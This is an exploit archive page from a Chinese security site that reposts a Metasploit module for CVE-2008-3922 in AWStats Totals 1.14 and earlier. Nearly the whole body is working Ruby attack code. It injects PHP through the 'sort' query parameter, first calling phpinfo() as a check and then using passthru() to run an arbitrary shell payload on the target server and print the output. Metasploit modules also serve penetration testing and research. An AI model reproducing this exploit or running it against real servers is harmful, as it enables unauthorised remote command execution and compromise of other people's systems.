首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AWStats Totals 1.14 Remote Command Execution
来源:http://www.metasploit.com 作者:patrick 发布时间:2011-05-26  
##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats Totals =< v1.14 multisort Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 12715 
, 'References' => [ ['CVE', '2008-3922'], ['OSVDB', '47807'], ['BID', '30856'], ['URL', 'http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt'], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Aug 26 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "The full URI path to awstatstotals.php", "/awstatstotals/awstatstotals.php"]), ], self.class) end def check res = send_request_cgi({ 'uri' => datastore['URI'], 'vars_get' => { 'sort' => '"].phpinfo().exit().$a["' } }, 25) if (res and res.body.match(/localhost/)) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit command = Rex::Text.uri_encode(payload.encoded) sploit = datastore['URI'] + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["' res = send_request_raw({ 'uri' => sploit, 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") m = res.body.match(/YYY\n(.*)\nYYY/m) if (m) print_status("Command output from the server:") print("\n" + m[1] + "\n\n") else print_status("This server may not be vulnerable") end else print_status("No response from the server") end end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Allwin WinExec add new local a
·PHP <= 5.3.5 socket_connect()
·Clipbucket 2.4 RC2 645 SQL Inj
·VisiWave VWR File Parsing Trus
·DNS Reverse Download and Exec
·Magix Musik Maker 16 .mmm Stac
·Magneto ICMP ActiveX v4.0.0.20
·Magix Musik Maker 16 .mmm Stac
·HP Data Protector Client EXEC_
·HP Data Protector Client EXEC_
·Mac osX Browsers [FF + SF] ale
·Poison Ivy 2.3.2 (Latest versi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved